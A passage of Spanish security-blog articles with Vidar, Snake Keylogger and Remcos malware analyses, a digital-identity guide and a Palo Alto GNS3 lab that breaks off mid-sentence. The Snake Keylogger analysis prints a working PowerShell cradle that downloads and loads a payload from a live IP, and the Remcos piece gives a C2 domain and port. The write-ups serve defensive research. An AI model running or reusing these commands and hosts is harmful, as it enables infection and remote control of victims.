procesos, memoria, lenguaje, ruta del Malware, software instalado (no sale en la imagen pero viene después), etc. [Imagen: Informacion enviada por el malware sobre procesos] El fichero de passwords.txt muestra si tienes alguna guardada en los navegadores. > Cuidado con guardarlas las contraseñas en el navegador, es mejor usar un gestor de contraseñas y usarlo cuando lo necesites. [Imagen: Malware contraseñas guardadas en el navegador] De lo que se trata en el artículo es de ponerle un nombre a este Malware y aún no lo tenemos, no ha sido detectado por la plataforma así que toca investigar un poco más. Lo siguiente que podríamos hacer es buscarlo en Virus Total. Como lo que me interesa es el exe, busco éste y no el zip. [Imagen: Muestra VirusTotal] Solamente 1 muestra que se trata de un stealer, sin más, toca seguir investigando. ¿Os acordáis del empaquetador que utilizaron? Para conocer más sobre el Malware hay que desempaquetarlo. Hay herramientas como retdec que ayudan para este en concreto. Pero nosotros hemos venido a jugar, así que vamos a hacerlo a mano. Abrimos el Malware con x64dbg y paramos en el EntryPoint. [ Refrescando conceptos ] [Imagen: x64dbg con Malware Netflix Stealer] Vemos una instrucción pushad. Os recuerda a UPX, ¿verdad? Pulsamos F8. Mostramos el contenido de ESP en el volcado de memoria y ponemos un “hardware breakpoint” en “access - dword”. [Imagen: Instruccion Pushad Malware] Pulsamos F9 para parar en el breakpoint que acabamos de poner y nos detenemos en ese salto. [Imagen: Salto Breakpoint ejecución de Malware] Que nos llevará al Original Entry Point (OEP) pulsando F8. [Imagen: Original Entry Point] Ahora deberíamos tener acceso a las cadenas de este Malware, pulsamos en el icono de las strings y vemos el contenido de lo que aparecía en Any.run como captura de pantalla y borrado del Malware. [Imagen: Ejecuciones de Malware] O el comportamiento de extracción de credenciales de los navegadores o búsqueda de información del equipo: [Imagen: Comandos de extracción de credenciales Malware Netflix] Y lo que nos va a permitir ponerle un nombre a este Malware. Vemos una serie de URL sospechosas. [Imagen: Busqueda de cadena de caracteres e IOCs en Malware Netflix] Si buscamos la primera de ellas, daremos en el clavo, se trata de Vidar. Aquí podéis comprobarlo. [Imagen: Malpedia Malware Netflix Vidar] Una página que recopila información sobre las familias de Malware es Malpedia, muy útil en cualquier caso, van actualizando las noticias sobre cualquier Malware que conozcáis, sin duda es una página de referencia. Para localizar más Malware de esta familia, os recomiendo Tria.ge. Fijaros lo que podéis obtener, selecciono 1 al azar, si es capaz de extraer los datos del Malware, esto será lo que veáis: [Imagen: Extraccion de Malware en Triage] Los C2 coinciden con el que acabamos de ver, aunque no la versión, 54.8. [Imagen: Versión de Stealer en Netflix encontrada en Tria.ge] Como acabáis de comprobar, no os podéis fiar de las aplicaciones que dicen ser gratuitas sobre servicios de pago como Netflix o cualquier otro, al final te la pueden colar y salirte muy caro. Espero que os haya gustado el POST y nos vemos en el siguiente!! --- # Snake Keylogger, se consolida como uno de los malware mas usados URL: https://ciberseguridad.blog/snake-keylogger-se-consolida-como-uno-de-los-malware-mas-usados/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-09-18 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Snake Keylogger, es un troyano capaz de capturar todo lo que teclea el usuario, buscar información sensible en navegadores, clientes de correo... Hola a tod@s! Hoy veremos como ocultan el Malware a través de varios artefactos colocados en diferentes sitios para que te vuelvas, literalmente, loco. Fijaros en esta muestra. [Imagen: Muestra Snake Keylogger] Aquí tenemos casi todo el flujo completo, desde el correo (punto de entrada) hasta parte del malware final, aunque no se vea en la captura... El usuario recibe un correo con un fichero Excel adjunto: [Imagen: Adjunto de correo con malware] Esto es muy común, el 99% de las veces ocurre de esta forma. Tratan de confeccionar un correo que sea creíble y te adjuntan un fichero de este tipo que aprovecha alguna vulnerabilidad. Otras veces, se envía un fichero PDF con un enlace u otro en formato DOC, que es menos detectado para los Antivirus, Reglas Yara, etc. Sólo con un enlace a donde descarga el malware que quieren que ejecutes. Veamos qué es lo hace este fichero Excel, primero en Any.run: [Imagen: Ejecucion de Snake Keyloger en Anyrun] Se aprecia “EQNEDT32.EXE”, o lo que es lo mismo, aprovecha alguna vulnerabilidad de Microsoft Office relacionada con el Editor EQUATION (¿ CVE-2017-11882 ? Posiblemente). Lo primero que podemos hacer es buscar el hash en Virus Total, si se encuentra ahí, siempre, es una ayuda para identificar lo que es. Y su comportamiento, no hay que olvidar que el malware se ejecuta en varios entornos de sandbox y nos muestran el resultado de todos ellos. [Imagen: Hash de Snake Keylogger en Virustotal] Virus Total nos confirma nuestras sospechas y si vamos a la pestaña de comportamiento, vemos como parece que descarga algo (un fichero VBS) y lo ejecuta. [Imagen: Comunicaciones Snake Keylogger] Después parece consultar su dirección IP en checkip.dyndns.(com|org), pero eso ya vendrá más adelante. De momento, estamos con el fichero Excel. Any-run también nos advertía de lo que se venía encima, pulsando sobre EQNEDT32.exe, en el detalle del proceso se podía ver la vulnerabilidad que aprovecha. Así que ya lo confirman tanto Any-run como Virus Total, aprovecha CVE-2017-11882o alguno similar. Seguramente, lo ha detectado por el comportamiento, EXCEL → EQNEDT32.exe → Wscript.exe [Imagen: Snake Keylogger Wscript] Fijaros en esto, es la shellcode que se ejecuta desde el Editor vulnerable de Microsoft. [Imagen: Shellcode Snake Keylogger] Traduzco todo esto: [Imagen: URLDownloadToFileA Snake Keylogger Malware] Obtiene la ruta del fichero que va a guardar, hace uso de una variable de entorno %APPDATA% y obtiene las direcciones de las funciones que va a utilizar con LoadLibraryA y GetProcAddress (esto en tiempo de ejecución). Después con la función URLDownloadToFileA descarga el fichero desde la URL que veis y lo guarda como un fichero VBS. A continuación, lo ejecuta con ShellExecuteA (por lo que se ejecutará con el programa asociado a la extensión vbs) y finaliza el proceso. Si hacemos caso de Any-run, ¿ Por qué no íbamos a hacerlo ? El fichero VBS ejecuta un comando Powershell. ``` "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/bug/dll_nostartup.mp4'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.gdfsdffdssfdgdddfhgdghfgf/42.021.871.591//:ptth')) ``` Tenemos 2 URL, esa que termina en .mp4 y otra en .txt. ¿Que donde está esta última? Está al revés. [Imagen: Cyberchef Reverse] Su contenido en el fichero se encuentra al revés como antes, acostumbraros a ver las cosas al revés, por lo menos en lo que vais a ver en este artículo: [Imagen: Payload txt Snake Keylogger] Así que si le damos la vuelta y tenemos un bonito fichero PE. [Imagen: Reverse Base64 CyberChecf archivo PE] En cuanto a la otra URL, no os fiéis de la extensión, no es un .mp4, sino otra cadena codificada en base64. [Imagen: Cadena de codificación base64] Que una vez decodificada obtenemos otro fichero PE. [Imagen: Nuevo fichero PE base64 reverse] Los 2 binarios están ofuscados, aunque solamente parezca que lo está 1 de ellos. [Imagen: Binarios ofuscados] Si os acordáis del comando Powershell, teníamos: GetType('ClassLibrary3.Class1').GetMethod('Run') Esto se encuentra en el fichero procedente de dll_nostartup.mp4, lo pongo de esta forma para recordarlo base64decode(“dll_nostartup.mp4”) = otro fichero PE: [Imagen: Otro fichero PE con Malware] Y vemos, de nuevo, otra URL al revés para descargar. Después se utiliza una función para reemplazar, le da la vuelta y decodifica la cadena base64, generando otro PE. [Imagen: Fichero Malware Ofuscado] Este fichero PE también está ofuscado y por el nombre, se intuye lo que hace. [Imagen: Malware desofuscado] Una vez desofuscado, tenemos lo que parecía, se utiliza para poder ejecutar en memoria cualquier binario con la técnica conocida como RunPE o Process Hollowingy que no pise disco para que no pueda ser analizado por los Antivirus. [Imagen: Ejecución de proceso Malware en memoria] Entonces tenemos que 1 de los binarios iniciales está destinado a ejecutar algo en memoria, y ¿el otro, el que procedía de fgfhgdghfdddgdfssdffdsfdg.txt? Después de desofuscarlo, tiene el siguiente aspecto: [Imagen: Proceso Malware en memoria despfuscado] Algunos los habréis identificado solamente con ver esos ns1 … ns17, ¿verdad? En la configuración de este malware podemos ver cómo envía la información que va recopilando. [Imagen: Envio de información del malware] Las más comunes que veréis son por correo, como este y también Telegram o FTP (las que menos). Lo sé, aún no os he dicho qué es… Bajamos un poco más en el código y saldremos de dudas, me quedo con esta captura: [Imagen: Snake Keylogger envio por mail] Así que se trata de Snake Keylogger, este troyano es capaz de capturar todo lo que teclea el usuario, además de buscar información sensible en navegadores, clientes de correo, portapapeles, etc. Como curiosidad, tiene un listado interminable de procesos que no le gustan. [Imagen: Procesos que detecta Snake Keylogger Parte 1] [Imagen: Procesos que detecta Snake Keylogger Parte 2] Si encuentra alguno, ya sabéis, lo finaliza. Este comando os puede servir para identificarlo, su auto-borrado. [Imagen: Comando autoborrado Snale Keylogger] La persistencia la crea mediante una clave de registro en Run, en HKCU (del usuario autenticado). [Imagen: Persistencia Malware] Y aquella petición que veíamos en Virus Total a checkip.dyndns.org, la hacía este malware para obtener su IP en internet y adjuntarlo en el envío. [Imagen: Obtención de IP para el envio de información del Keylogger] Este malware parece que afecta cada vez más a España, según las noticias Ciberseguridad que podáis leer, así que cuidado con él. Espero que os haya gustado el POST y ¡¡nos vemos en el próximo!! Saludos --- # Los peligros de no tener una identidad digital protegida URL: https://ciberseguridad.blog/los-peligros-de-no-tener-una-identidad-digital-protegida/ Tipo: Artículo Autor: onBRANDING Publicado: 2022-09-14 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > La exposición de los usuarios en la red, tanto en el ámbito corporativo como personal, es cada vez mayor. Con la pandemia, se ha incrementado el teletrabajo (y el uso de equipos domésticos para trabajar) y nos hemos volcado en la red de tal forma, que nuestra huella digitales cada vez mayor, es tanta la información que dejamos, que se hace casi imposible plantearnos borrar nuestro rastro en Internet. Los delincuentes lo saben y por ello la criminalidad en la red está creciendo de manera expone La exposición de los usuarios en la red, tanto en el ámbito corporativo como personal, es cada vez mayor. Con la pandemia, se ha incrementado el teletrabajo (y el uso de equipos domésticos para trabajar) y nos hemos volcado en la red de tal forma, que nuestra huella digitales cada vez mayor, es tanta la información que dejamos, que se hace casi imposible plantearnos borrar nuestro rastro en Internet. Los delincuentes lo saben y por ello la criminalidad en la red está creciendo de manera exponencial, algunas cifras así lo indican: - España es el país de la Unión Europea que más víctimas de robo de identidad ha registrado, según cifras de la oficina Europea de Estadística (Eurostat). - Las empresas españolas sufren alrededor de 40.000 ciberataques diarios. El 90%de las compañías asegura estar muy preocupado por la protección digital de sus proveedores y de la cadena de suministro. - En los últimos 10 años los ciberdelitos (conocidos) aumentaron un 613,5% Y ya representan el 15,6%de todos los delitos cometidos en España. [Imagen: Los factores que amenazan nuestra identidad digital] Es imprescindible, por tanto, ser consciente de la gran importancia que supone contar con recursos que garanticen una experiencia digital más segura, tanto para empresas como para usuarios. Debemos tomar el control sobre nuestra identidad digital, decidir quiénes acceden a nuestros datos, e incluso cuándo y cómo. Y para ello hay que gestionarlos. Cuidar la IDENTIDAD DIGITAL minimiza los riesgos de sufrir un CIBERATAQUE y una crisis de PRIVACIDAD, SEGURIDAD y su consecuencia en REPUTACIÓN. ## La ciberamenaza cotidiana, un caso real Juan recibió un correo electrónico de Netflix, en el correo le explicaban que la empresa había sufrido un hackeo en la que se habían filtrado datos de sus usuarios, y le pedían por favor si podía resetear su contraseña a través del enlace que le facilitaban. Nada hizo sospechar a Juan, el correo electrónico tenía todo el aspecto de ser de Netflix y estaba perfectamente redactado. Pero en realidad, lo que hizo Juan fue acceder a una página web que simulaba ser de Netflix y con total confianza puso su nombre y su contraseña real. Acabada de darle acceso total a su cuenta de Netflix a un ciberdelincuente, o incluso, más preocupante, si además añadimos otro tipo de datos, como podrían ser los bancarios. [Imagen: Imagen WeLiveSecurity] En esta historia hay algo en lo que el ciberdelincuente no mintió: en efecto Netflix había sufrido un hackeo, pero Juan no lo sabía y de haberlo sabido, ¿tendría que haber hecho algo? Muy al contrario de lo que se suele pensar, los delincuentes no requieren de un gran conocimiento técnico, solamente requieren poseer un gran poder de persuasión, ser creíbles para lograr la confianza de su víctima y que esta no sea capaz de detectar la amenaza. ### ¿Cuáles son los ciberdelitos más comunes y cómo protegernos? Desde onBRANDING distinguimos dos tipos delitos: los ataques de baja capacidad técnica, donde nos encontramos delitos como: casos de sextorsión, phishing (lo que le sucedió a Juan) o la estafa del CEO. Y delitos de alta capacidad técnica, donde englobamos delitos como ataques ransomware, intrusiones / exfiltraciones de información y ataques de denegación de servicio (DoS). #### Delitos de Sextorsión Suelen derivarse de prácticas de sexting, pero a veces estas estafas pueden ser falsas. Consejos para evitar ser víctima de sextorsión: - No proporciones, información personal (íntima, profesional…) a desconocidos en Redes Sociales. - Privatiza correctamente tus perfiles en redes sociales y WhatsApp. - Utiliza números de teléfono y correos electrónicos diferentes a los personales / profesionales para contactar con desconocidos. - Por regla general, desconfía y no envíes fotografías en las que seas identificable. #### Phishing Engañan a la víctima para que comparta información confidencial como contraseñas o números de tarjetas de crédito. La más usual, es mediante correo electrónico o mensaje de texto. Se suplanta la identidad de una persona u organización de confianza. En este tipo de estafas se suele exigir a la víctimaque actúe de inmediato. Consejos para evitar ser víctima de una campaña de phishing: - No proporciones información bancaria en páginas web a las cuales has accedido desde un enlace incluido en un SMS o un email. - Los códigos desechables que envían por SMS son secretos y, por ejemplo, los bancos o empresas nunca los pedirán por correo o llamada. - Por regla general, desconfía de todos aquellos mensajes alarmantes o que tengan tono de urgencia (“Cuanto antes mejor”). - Nunca respondas a este tipo de comunicaciones sospechosas. - Recuerda que las páginas web seguras empiezan siempre por https y contienen un candado cerrado en la barra de navegación. - Pulsa sobre el candado para comprobar que el certificado es válido. #### La estafa del CEO El estafador llama o envía correos electrónicos haciéndose pasar por un alto cargo de la compañía. Su objetivo es claro, engañar a los empleados que tienen acceso a los recursos económicos para que paguen una factura falsa o hagan una transferencia desde la cuenta de la compañía. Consejos para evitar ser víctima de este tipo de estafa: - Respeta estrictamente los procedimientos de seguridad vigentes para los pagos y las compras. - No te saltes ningún paso y no cedas a la presión. - Revisa siempre con cuidado las direcciones de correo cuando tengas información delicada o hagas transferencias. En caso de duda sobre una orden de transferencia, consulta a un compañero experto. - No abras nunca enlaces o adjuntos sospechosos recibidos por correo. Ten especial cuidado al consultar tu correo personal en los ordenadores de la empresa. - No compartas información sobre el organigrama, la seguridad y los procedimientos de tu compañía. - Si recibes un correo sospechoso, informa siempre al departamento de informática / ciberseguridad. #### Ataques ransomware Es un tipo de malware que impide a los usuarios acceder a su sistema o a sus archivos personales y que exige el pago de un rescate para poder acceder. Consejos: - No hacer clic en enlaces peligrosos. - Evita revelar información personal. - No abras archivos adjuntos de correos electrónicos sospechosos. - No utilizar memorias USB desconocidas. - Mantener programas y sistema operativo actualizado. #### Intrusiones / exfiltraciones de información Exposición de información a un entorno no confiable. Las filtraciones de datos a menudo son resultado de ataques maliciosos #### Denegación de servicio (DoS) El delincuente deja sin servicio los servicios que tenga una empresa en internet. Posibles consecuencias: dejar sin servicio el servidor de correo electrónico, la página web,etc. ### 14 recomendaciones básicas para tener una identidad digital protegida - Configurar la privacidad y la seguridad en las redes sociales. - Cuidado con compartir tu geolocalización mientras estás en un lugar. - Valora la privacidad de la información e imágenes que se publican, tanto propia como de terceros. - Hacer un seguimiento periódico de la información que hay sobre uno mismo en la Red. - No instalar programas informáticos ajenos en proveedores oficiales o que no sean estrictamente necesarios para el desempeño del trabajo. - Evitar acceder a redes sociales o cuentas personales en dispositivos ajenos. Si lo haces, cerrar la sesión en los dispositivos al acabar. - No navegar con Wifi Públicas (ciudades, hoteles, restaurantes, cafeterías, aeropuertos, estaciones, tiendas... por más que no haya cobertura). Se generan redes Wifi falsas con nombres como Wifi Gratis, Wifi Aeropuerto para esnifar datos. - Utilizar una VPN para enmascarar nuestra navegación. Imprescindible si navegas por WIFIs desconocidas o públicas. - Usar equipos informáticos y dispositivos móviles propiedad de la empresa. - Activar el Doble Factor de Autenticación en nuestras cuentas. - Emplear contraseñas diferentes para cada servicio. ## Proteger tu identidad digital es una prioridad A lo largo de este post , hemos visto como poder proteger nuestra identidad digital, nuestro "DNI en Internet" , de la mano de una de las firmas más relevantes de dicha especialización en el sector. Pueden parecer obviedades (para aquellos que trabajamos en el sector de la ciberseguridad ), pero la identidad digital es la principal afectada por los ciberdelincuentes en los miles/millones de ataques diarios. El caso de Juan, es recurrente, pero eficaz. onBRANDING es la primera firma española de analistas de la identidad digital y protección de la reputación online. Cuenta ya con más de 15 años de experiencia en ciberinvestigación y protección de la privacidad, la seguridad y la reputación digital de empresas. Al mando de la misma, un referente en el sector, Selva Orejón, consultora experta en ciberseguridad e identidad digital y perito judicial; profesora universitaria y colaboradora en diversos programas de radio y televisión, autora también de diversos ensayos sobre su especialidad. Un referente en el sector al alcance de cualquiera, donde ante cualquier duda, podréis localizar a Selva en su perfil público de MyPublicInbox, y que, como hizo conmigo , seguro que os atenderá encantada. Y recordad, no descuidéis vuestra identidad digital, aunque no os pasase nada "de momento". [Imagen: Selva Orejon] --- # Tampoco es una factura, es Malware URL: https://ciberseguridad.blog/tampoco-es-una-factura-es-malware/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2022-08-25 Actualizado: 2026-10-04 Tema: Herramientas para hackear > Volvemos a analizar una supuesta factura , pero lo que nos encontramos es Malware. Tener cuidado con las facturas falsas en el correo. Hola a tod@s! Buscando malware en Any.run como en otras veces, he visto esta supuesta factura que me ha parecido interesante mostrarla, claro, que NO es una factura como os podréis imaginar. FACTURAS VENCIDAS.pdf.lnk [Imagen: Factura Vencida Malware] MD5: 321240E769016FA53AF40CB6AB98CC0D [Imagen: Anyrun Factura Malware] Podemos ver un comando Powershell y la ejecución de un fichero HTA desde una URL. Pero antes de llegar a eso, veremos qué aspecto tiene el fichero en cuestión. [Imagen: Archivo con extension LNK] Es un fichero de enlace de acceso directo (.LNK), por ello, editándolo podemos ver su contenido fácilmente. El comando que es ejecutado una vez que se haga doble clic sobre él, sería el primero que veíamos en la captura de Any.run, el comando Powershell como se muestra a continuación. [Imagen: Ejecución de PowerShell en Binario] Vamos a hacer una cosa, cogemos esa cadena con un editor hexadecimal, el que más os guste y lo limpiamos. [Imagen: Cadena Hexadecimal Maliciosa] Lo pegamos en Cyberchef y le aplicamos “From Hex” y “Remove null bytes” y tendremos el comando Powershell listo para poder jugar con él. [Imagen: Hexadecimal en CyberChef] Alguno estaréis pensando, con razón, que ya lo teníamos en Any.run pero la idea es ver todo esto como si nos lo hubiesen enviado directamente a nosotros. [Imagen: Quitar Ofuscación] Esto no hace otra cosa que ejecutar con mshta.exe el contenido de la URL. Pero, ¿ qué contiene ese fichero envios.hta ? Any.run no nos aporta gran cosa ya que falla a la hora de descargar el fichero: [Imagen: Descarga Anyrun malware] No pasa nada, lo descargamos a mano y vemos su contenido, código VBS. [Imagen: Código Malware VBS] Vemos como hay 4 funciones y la llamada inicial a una de ellas. Nos llama la atención ese Run que nos indica que va a ejecutar algo. ``` WFnmb.Run(kdUGmCQS),0,true ``` Así que pondremos hincapié en ver que contiene esa variable. [Imagen: Contenido de variable] Ahora ya tenemos el comando que se esconde detrás de ese fichero HTA. Dejamos el comando más bonito para poder entender lo que hace. [Imagen: Malware Legible] Todo pinta a que descargará algo y lo ejecutará, vemos un “envioa16.exe”, posibles llamadas a ejecuciones con rundll32.exe, powershell.exey ejecución directa de procesos: [Imagen: Guardado APPDATA] Vemos donde lo guardará, en %APPDATA%. [Imagen: Descarga de malware factura] Pero antes, ¿qué más se encuentra en ese servidor desde donde se descarga el malware? Tiene listado de directorios, así que se puede ver y descargar todo su contenido. [Imagen: Pagina descarga malware Factura] Parece que ese dominio es de creación reciente: [Imagen: Registro dominio malware] Y hay fabricantes a los que no les gusta nada de nada, por algo será. [Imagen: VirusTotal Malware factura] Echemos un vistazo rápido a ese “envioa16.exe”, busquemos cosas interesantes que nos ayuden a identificar lo que estamos viendo. ``` MD5: 3f146204fb84a87777b40595b188b6bb SHA1: b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07 SHA256: d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269 IMPHASH: f34d5f2d4577ed6d9ceec516c1f5a744 ``` Una aplicación compilada para arquitecturas de 32 bit compilada con .NET. [Imagen: Malware 32bit .NET] En estos casos la mejor opción si se quisiera analizar sería dnSpy. [Imagen: DNSpy] El objetivo del POST es ver qué malware hay detrás, así que, utilizaremos la información contenida en las diferentes Sandboxes en donde se encuentre, es más rápido. También se podría abrir con IDA, aunque la diferencia es clara. [Imagen: Resultado IDA] Nada más abrirlo vemos esa URL, cuyo contenido es el siguiente: [Imagen: Malware XML pastebin] Aparecen unos tags y como inicio y fin. También lo podíamos ver con dnSpy anteriormente. Generalmente, cuando el malware usa Pastebin es para recuperar datos (no digo que este sea el caso, pero lo hacen para que no estén ciertos datos directamente accesibles dentro del binario y que puedan ser detectados por reglas yara, antivirus, etc.) para realizar alguna acción en concreto, ya sea transformarlo en otro binario o lo que se le ocurra al programador. Si buscamos el fichero inicial en otras Sandboxes, podremos verlo en Triage, alguien lo subió ahí, así que vamos a aprovechar que lo tenemos y nos fijaremos en lo que ha detectado. Esta es la URL. En donde podemos ver claramente a qué corresponde, REMCOS (acrónimo de Remote Control & Surveillance Software). Es un software de acceso remoto utilizado para controlar equipos de forma remota que, una vez instalado y/o ejecutado, abre una puerta trasera en el PC, otorgando acceso completo al usuario remoto. Esta plataforma es capaz de extraer la configuración y C2 del mismo. [Imagen: Triage Malware] Esta detección no sale directamente del .LNK sino del ejecutable descargado por este, en donde podemos ver como se ejecuta como edge.exeen el directorio %APPDATA%. [Imagen: registro Malware Triage] Vamos a ver como sacar la configuración de REMCOS, para ello tendremos que extraerlo primero de la memoria, después de ejecutar envioa16.exe. Una vez extraído, nos fijamos que tiene un fichero de recursos. [Imagen: Configuración de malware factura] Ese fichero es el encargado de extraer la configuración del malware. [Imagen: Extracción de Malware] Tenemos que el tamaño de la clave es 0x20. La clave es lo que le sigue con ese tamaño y después está la configuración cifrada con una función RC4. Por lo tanto, podemos utilizar Cyberchef para extraerla. [Imagen: Extracción malware factura en Cyberchef] Y aquí la tenemos con C2 incluído, nombre de la campaña y los atributos que se veían en Triage. ``` $ strings remcos_config.bin logisitica.discisoted.info:5505:1 |ENVIOJAGOSTO 16| |975D06KVT0| |remcos.exe| |Remcos| |yyuhajsstr-SGRMTP| |logs.dat| |10| |Screenshots| |MicRecords| |Remcos| |fryuias| |0140B8DDE10BBC997CF2616C0E80A4B1| |100000| 19700101000000Z 20901231000000Z00Y0 05Id] 05Id] .P@' 19700101000000Z 20901231000000Z00Y0 ``` [Imagen: Dominio malicioso malware Factura] Si recordáis el domino desde donde se descargaba el HTA que contenía Colombia al igual que esta IP donde se aloja el C2, y el RAT es REMCOS, ahí lo dejo… :D Así que vemos como otra supuesta factura no lo es en realidad, sino una herramienta de Acceso de Control Remoto usada para fines… seguro que para nada bueno. Espero que os haya gustado, nos vemos en el siguiente POST!! --- # Creando nuestro laboratorio de Palo Alto en GNS3 URL: https://ciberseguridad.blog/creando-nuestro-laboratorio-de-palo-alto-en-gns3/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2022-08-19 Actualizado: 2026-10-04 Tema: Laboratorios de ciberseguridad > Montamos nuestro laboratorio de Palo Alto, en su "nueva" versión mayor PANOS 10, dando acceso a los usuarios a través del propio Firewall. Tras montar nuestro laboratorio de Fortinet , vamos a ver como montar nuestro laboratorio de Palo Alto, en su "nueva" versión mayor 10, dando acceso a los usuarios a través del propio FW. A lo largo del laboratorio podremos ver el proceso end to end y configuraremos nuestro laboratorio en su totalidad con el fin de poder disponer de una maqueta real. Uno de los inconvenientes que tendremos en nuestro laboratorio, es que, sin una licencia de Palo Alto, no podremos ver el tráfico utilizando la función de monitor, ni tampoco dispondremos de actualizaciones dinámicas, pero di que podremos disponer de la configuraciones básicas de los equipos. El principal objetivo del laboratorio, será la integración del Firewall de Palo Alto en GNS3 y la configuración del interfaz de management. Una vez con acceso a los propios equipos, accederemos a la GUI del firewall, conectaremos el enlace de Internet y configuraremos la red externa. ## Instalación de Palo Alto Para obtener la imagen de Palo alto, debemos tener un acuerdo de servicio. Podemos obtener la imagen de Palo alto ( .qcow2 ) desde la web de soporte del propio fabricante. Si no disponéis de acceso, siempre podréis buscar por internet. Si no queremos una versión concreta, podremos instalar los appliances de Palo Alto de la propia pagina de GNS3, disponiendo de la opción de la version 10.0 como última. No es una versión recomendada para poner en producción, pero si que nos servirá para poder ver las principales diferencias respecto a la versión 9. Para los que no dispongais de soporte Palo Alto, os dejo una imagen ( No se lo que durará ) de PAN OS 10.0.4 en extensión .qcow2 lista para importar como veremos a continuación: [Imagen: Importación de Imagen en GNS3] Como ya vimos, crearemos una nueva versión ( ya que disponemos de la 10.0.4 ) , si no, importaríamos en la versión correspondiente el archivo, selecionamos el archivo en extensión ( .qcow2 ) y GNS3 empezara a importar la maquina virtual. [Imagen: Importar imagen en GNS3 con ( .qcow2 )] En este laboratorio, la diferencia con respecto al anterior, es que me he visto obligado a empezar a usar Hyper-V , aunque he de decir que esta "obligación" , me esta pareciendo de lo más satisfactoria. Os indico esto, por que aunque os trasladé y traslado que soy un enamorado de VMware, veréis las capturas de Hyper-V , ya que el procesador, no me deja virtualizar correctamente en VMware 😥, y en este caso, la maquina de Palo Alto, nos va a requerir un mínimo de 4Gb de Memoria. Una vez importada la maquina, veremos que ya la tenemos disponible para trasladar a nuestro espacio de trabajo. [Imagen: Palo Alto listo para instalar en GNS3] Donde dispondremos de ella , en el apartado de Firewalls, junto con la importación del Fortigate del laboratorio GNS3 anterior una vez añadamos el template en la parte inferior: [Imagen: Máquina disponible Palo Alto en GNS3] ## Cambio de interfaz de red en Palo Alto Por defecto, el firewall de Palo se instala con el tipo de interfaz como E/S de red virtualizada. Por lo que tendremos que cambiarlo, como paso previo a empezar con nuestro laboratorio. Si no lo cambiamos, sólo podremos utilizar la parte de gestión, y no cualquier otra interfaz de zona de nuestro Firewall. Para cambiar el tipo de interfaz de red, hacemos clic con el botón derecho del ratón en el dispositivo Palo Alto que acabamos de instalar y luego clic en la pestaña Red, donde deberíamos ver que está seleccionada por defecto como E/S de red virtualizada. Hacemos clic en la lista desplegable y elegimos Intel Gigabit Ethernet (e1000). [Imagen: Cambio adaptador de red Palo Alto GNS3] [Imagen: Cambio a adaptador e1000 Palo Alto] ## Ampliando capacidad en equipo Palo Alto El cortafuegos de Palo Alto funcionaría muy bien, con una CPU. Sin embargo, para obtener un buen rendimiento, es necesario cambiar la CPU a dos. Y podremos hacerlo casi de la misma forma que el cambio de adaptador. En la misma ventana de configuración de la VM, hacemos clic en Configuración general, donde podremos cambiar el valor de la CPU a dos o más. ( Con dos sobraría , aunque dependerá del propio laboratorio en si que montemos ). [Imagen: Ampliación de cores en Palo Alto] ## Iniciar sesión en Palo Alto por CLI. Una vez tenemos instalado nuestro firewall, procederemos a iniciar la configuración de red propia de nuestro laboratorio. Para ello, arrastramos y soltamos el firewall en el área de trabajo ( Nuestro proyecto ), hacemos clic con el botón derecho en el firewall, y lo arrancamos haciendo clic en start: [Imagen: Arrancar Palo alto GNS3] Haga doble clic en el dispositivo para abrir la consola, y en la consola de PaloAlto VM, introduzca el nombre de usuario como admin y la contraseña como admin. Una vez encendida la máquina ( Nos saldrá un putty ), deberemos esperar un rato, ya que el arranque de la VM tardará entre 5 y 10 minutos. > Durante este tiempo, si intentamos iniciar la sesión en el Palo Alto, nos devolverá siempre "inicio de sesión incorrecto". (1) Al estar utilizando una versión superior a la 9.0 de Palo Alto, cuando iniciemos sesión con las credenciales por defecto por primera vez, nos pedirá que cambiemos la contraseña de inmediato. (2) [Imagen: Cambio de contraseña Palo Alto] NOTA: Tras poner la password he intentar configurar la IP, vi cierta inestabilidad en la versión 10.0.4 , por lo que decidí continuar el laboratorio instalando la versión 10.1.6. El proceso de instalación , es idéntico al trasladado anteriormente. No he conseguido encontrar una versión de la 10.1 en adelante por internet, pero seguro que estarán si insistimos en buscarla. [Imagen: Palo Alto 10.1.6] ## Cambia la longitud del terminal de consola. Es probable que una vez iniciado , cuando empecemos a trastear con la consola del Firewall Palo Alto, no nos muestre correctamente la salida. Para arreglar esto, necesitaremos cambiar la longitud del terminal en la pantalla del CLI. Hacemos doble clic en el CLI y ajustamos la altura y el ancho de la misma con los siguientes comandos: [Imagen: Cambio tamaño CLI en Palo Alto] NOTA: Os dejo un consejo también. Al tratarse de un laboratorio y no existir problema en ello, os aconsejo que anotéis los usuarios, pass, ips ... será mucho más didáctico, y podremos pasar a quien consideremos el laboratorio montado. ``` set cli terminal height 500 set cli terminal width 500 ``` ## Configurar interfaz de gestión en Palo Alto Ya hemos podido acceder a la CLI, pero la mayoría de las configuraciones que realizamos son a traves de la GUI ( Interfaz gráfica ), así que para acceder a la GUI, tendremos que configurar la IP de la interfaz de gestión. Para configurar la dirección IP de management del Palo Alto, podemos utilizar el siguiente comando: [Imagen: Configuración IP Palo Alto] Estamos usando la dirección IP 10.1.1.1. Que es parte de la misma subred que vamos a utilizar para el adaptador virtual. ``` configure set deviceconfig system type static set deviceconfig system ip-address 10.1.1.1 netmask 255.255.255.0 commit exit ``` Podemos verificar la configuración de la dirección IP introduciendo el comando: ``` show interface management ``` Como podemos ver, ya tenemos configurada la dirección IP de gestión del firewall Palo Alto: [Imagen: Show Interface Management Palo Alto] ## Accediendo a la GUI de Palo Alto Como hemos indicado, la mayoría de las configuraciones , las realizaremos por la GUI. Para ello, tenemos múltiples opciones, bien yendo por el interfaz de alguna de las virtualizaciones que tengamos ( Interfaz de VMware / Virtual Box ), o también podemos instalar una plantilla webterm, que nos permita conectarnos directamente a la maquina, siendo la opción más sencilla y rápida . Para ello, añadimos un template nuevo como ya vimos cuando instalamos nuestro Firewall Palo Alto: [Imagen: Captura del diálogo 